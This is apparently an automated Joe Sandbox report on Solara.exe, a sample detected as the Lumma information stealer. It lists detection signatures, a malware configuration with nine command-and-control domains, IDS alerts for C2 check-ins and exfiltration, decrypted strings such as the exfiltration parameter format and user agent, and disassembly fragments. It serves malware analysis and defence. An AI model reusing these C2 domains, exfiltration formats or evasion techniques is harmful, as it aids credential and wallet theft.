Edit tour

Windows Analysis Report
Solara.exe

Overview

General Information

Sample name:	Solara.exe
Analysis ID:	1532354
MD5:	25e61fd473a4a437c052fe60e4a76e0a
SHA1:	747c49b5e86b4a5c30f2685ec400708f918c814b
SHA256:	58c5681677bccc44d38ca7476282126d6f42810dbf8eaff735ee6d058d843b56
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Solara.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\Solara.exe" MD5: 25E61FD473A4A437C052FE60E4A76E0A)

Solara.exe (PID: 6812 cmdline: "C:\Users\user\Desktop\Solara.exe" MD5: 25E61FD473A4A437C052FE60E4A76E0A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["enlargkiw.sbs", "condifendteu.sbs", "resinedyw.sbs", "allocatinow.sbs", "explorationmsn.store", "vennurviot.sbs", "drawwyobstacw.sbs", "ehticsprocw.sbs", "mathcucom.sbs"], "Build id": "1AsNN2--6811018700"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: Solara.exe PID: 6812	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:03.983950+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49730	188.114.97.3	443	TCP
2024-10-13T01:33:04.958200+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.33.249	443	TCP
2024-10-13T01:33:05.919658+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.77.78	443	TCP
2024-10-13T01:33:06.958459+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49733	172.67.140.193	443	TCP
2024-10-13T01:33:07.874188+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49734	104.21.30.221	443	TCP
2024-10-13T01:33:08.805235+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49735	172.67.141.136	443	TCP
2024-10-13T01:33:09.810160+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-13T01:33:12.050230+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49738	104.21.53.8	443	TCP
2024-10-13T01:33:12.782217+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49739	104.21.53.8	443	TCP
2024-10-13T01:33:14.848711+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49742	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:03.983950+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49730	188.114.97.3	443	TCP
2024-10-13T01:33:04.958200+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49731	104.21.33.249	443	TCP
2024-10-13T01:33:05.919658+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49732	104.21.77.78	443	TCP
2024-10-13T01:33:06.958459+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49733	172.67.140.193	443	TCP
2024-10-13T01:33:07.874188+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49734	104.21.30.221	443	TCP
2024-10-13T01:33:08.805235+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49735	172.67.141.136	443	TCP
2024-10-13T01:33:09.810160+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-13T01:33:12.050230+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49738	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:12.782217+0200	2049812	1	A Network Trojan was detected	192.168.2.4	49739	104.21.53.8	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:08.373257+0200	2056559	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	172.67.141.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:09.322760+0200	2056557	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:07.468196+0200	2056561	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.30.221	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:04.533176+0200	2056567	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	104.21.33.249	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:03.425249+0200	2056571	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:05.454400+0200	2056565	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.77.78	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:06.495424+0200	2056563	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	172.67.140.193	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:03.992000+0200	2056568	1	Domain Observed Used for C2 Detected	192.168.2.4	50815	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:07.876071+0200	2056558	1	Domain Observed Used for C2 Detected	192.168.2.4	53173	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:08.828087+0200	2056556	1	Domain Observed Used for C2 Detected	192.168.2.4	49523	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:06.978222+0200	2056560	1	Domain Observed Used for C2 Detected	192.168.2.4	59870	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:04.003296+0200	2056566	1	Domain Observed Used for C2 Detected	192.168.2.4	62379	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:02.874735+0200	2056570	1	Domain Observed Used for C2 Detected	192.168.2.4	53019	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:04.960091+0200	2056564	1	Domain Observed Used for C2 Detected	192.168.2.4	51372	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:05.997096+0200	2056562	1	Domain Observed Used for C2 Detected	192.168.2.4	63554	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:13.489352+0200	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49740	104.21.53.8	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T01:33:11.056455+0200	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com:443/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 1.2.Solara.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["enlargkiw.sbs", "condifendteu.sbs", "resinedyw.sbs", "allocatinow.sbs", "explorationmsn.store", "vennurviot.sbs", "drawwyobstacw.sbs", "ehticsprocw.sbs", "mathcucom.sbs"], "Build id": "1AsNN2--6811018700"}

Machine Learning detection for sample

Source: Solara.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: drawwyobstacw.sbs
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: condifendteu.sbs
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: ehticsprocw.sbs
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: vennurviot.sbs
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: resinedyw.sbs
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: enlargkiw.sbs
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: allocatinow.sbs
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: mathcucom.sbs
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: explorationmsn.store
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp	String decryptor: 1AsNN2--6811018700

Source: Solara.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: Solara.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\d67tcqi\Literally.pdb source: Solara.exe
Source:	Binary string: C:\d67tcqi\Literally.pdb source: Solara.exe

Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C9546A FindFirstFileExW,	0_2_00C9546A
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C95854 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00C95854
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C9546A FindFirstFileExW,	1_2_00C9546A
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00C95854 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00C95854

Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+eax*8], 07E776F1h	0_2_00CFE000
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 64567875h	0_2_00CFA6B0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then push eax	0_2_00CCA670
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	0_2_00D007E0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	0_2_00CFA800
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	0_2_00CFA800
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, eax	0_2_00CFA800
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	0_2_00CFE830
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 731CDBF3h	0_2_00CFE830
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	0_2_00CF6C20
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+752D80C8h]	0_2_00CDCDC0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [edi+ebx]	0_2_00CBF550
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then dec eax	0_2_00CBD560
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00CD98B0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov dword ptr [esp+10h], 8F3C8951h	0_2_00CD98B0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ebx, eax	0_2_00CF9FB0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 53F09CFAh	0_2_00CF9FB0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov edx, ebx	0_2_00CF9FB0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [edi+ebx*8], 07E776F1h	0_2_00CF9FB0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-33C2697Ah]	1_2_004431C3
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 27BAF212h	1_2_004431C3
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000001B8h]	1_2_00411183
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, eax	1_2_00411183
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6B618F2Dh]	1_2_00411183
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Eh]	1_2_0042B2D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-522ADBD1h]	1_2_00423490
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-2AE6E5FBh]	1_2_0043C516
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, ebx	1_2_0043C516
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edi, byte ptr [edx]	1_2_004465D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	1_2_004465D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-14h]	1_2_0040E9B5
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edi, byte ptr [esi+edx+035E8DCAh]	1_2_00410AD1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx]	1_2_0040CF50
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 4E7D7006h	1_2_00442F0D
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_0042F000
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+eax*8], 07E776F1h	1_2_004440D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ebx, eax	1_2_00440080
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 53F09CFAh	1_2_00440080
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov edx, ebx	1_2_00440080
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [edi+ebx*8], 07E776F1h	1_2_00440080
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	1_2_0042D166
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	1_2_0042D1D1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	1_2_00427180
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+esi+7DD3323Ah]	1_2_004251A6
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov word ptr [ecx], si	1_2_004251A6
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], F3285E74h	1_2_00441270
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 731CDBF3h	1_2_00441270
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ecx-0000012Ah]	1_2_0042C204
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov dword ptr [esp+2Ch], esi	1_2_004452A0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, eax	1_2_0041E400
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_004304A1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-4E7A8F49h]	1_2_0043250E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	1_2_0043250E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	1_2_0042F5A0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then jmp eax	1_2_0042C644
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041D610
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [edi+ebx]	1_2_00405620
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then dec eax	1_2_00403630
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ecx-0000012Ah]	1_2_0042C6EF
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	1_2_0043E6B0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then push eax	1_2_00410740
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, eax	1_2_00425750
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0042B780
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 64567875h	1_2_00440780
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	1_2_004408D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	1_2_004408D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, eax	1_2_004408D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	1_2_004468B0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0042B963
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	1_2_00444900
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 731CDBF3h	1_2_00444900
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+1Ch]	1_2_0042A920
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-56h]	1_2_0042A920
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov edi, edx	1_2_004309D7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov edi, edx	1_2_004309D7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_004309D7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov edx, dword ptr [esi+0Ch]	1_2_004319E7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_004319E7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov edx, ecx	1_2_004319E7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov byte ptr [esi], al	1_2_0041F980
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov dword ptr [esp+10h], 8F3C8951h	1_2_0041F980
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_0042FA20
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041DA30
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov esi, eax	1_2_0041DA30
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, eax	1_2_0041DA30
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	1_2_00406AD0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, ebx	1_2_0043CAD0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00439A90
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	1_2_0042CB88
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then jmp ecx	1_2_00408CCF
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	1_2_0043CCF0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00424CF1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx esi, word ptr [ebp+eax*4+00h]	1_2_0040BCA0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx eax, word ptr [ebp+ebx*4+00h]	1_2_0040BCA0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then jmp eax	1_2_00429D54
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 07E776F1h	1_2_00429D54
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov esi, eax	1_2_00428D20
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov edx, ecx	1_2_00428D20
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then jmp eax	1_2_00428D20
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, ebx	1_2_00444DC0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0042FDD7
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov byte ptr [ebx], dl	1_2_0042FDE1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov ecx, dword ptr [esi+28h]	1_2_0042FDE1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then mov dword ptr [esi+08h], edi	1_2_0042FDE1
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-4A206314h]	1_2_00420D85
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-80h]	1_2_00420D85
Source: C:\Users\user\Desktop\Solara.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax-0000008Fh]	1_2_00420D85
